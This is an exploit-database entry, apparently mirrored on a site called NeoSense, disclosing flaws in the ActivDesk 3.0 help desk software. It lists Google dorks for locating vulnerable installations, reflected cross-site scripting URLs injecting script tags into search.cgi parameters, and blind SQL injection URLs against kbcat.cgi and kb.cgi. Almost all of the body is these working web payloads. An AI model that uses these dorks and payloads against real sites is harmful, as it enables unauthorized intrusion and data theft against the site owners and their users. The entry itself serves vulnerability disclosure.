[] NeoSense
E X P L O I T S
title author type platform port cve id

ActivDesk 3.0 - Multiple Vulnerabilities

Author: Brendan Coles
type: webapps
platform: cgi
port: 
date_added: 2011-06-23 
date_updated: 2016-12-18 
verified: 1 
codes: OSVDB-73345;OSVDB-73344;OSVDB-73343 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comadesk.zip
ActivDesk 3.0 multiple security vulnerabilities

# Date: 2011-06-24
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/

# Software: ActivDesk
# Version: <= 3.0
# Homepage: http://www.webhelpdesk-software.com/
# Google Dorks:
#  inurl:kbcat.cgi ext:cgi
#  "Help Desk Powered By ActivDesk"

# Vendor: FocalMedia
# Homepage: http://www.focalmedia.net/
# Notified: 2011-06-24 - Ticket# 67120010491


# Cross-Site Scripting (XSS):

http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script>
http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script>
http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script>
http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>


# Blind SQL Injection:

http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''='
http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.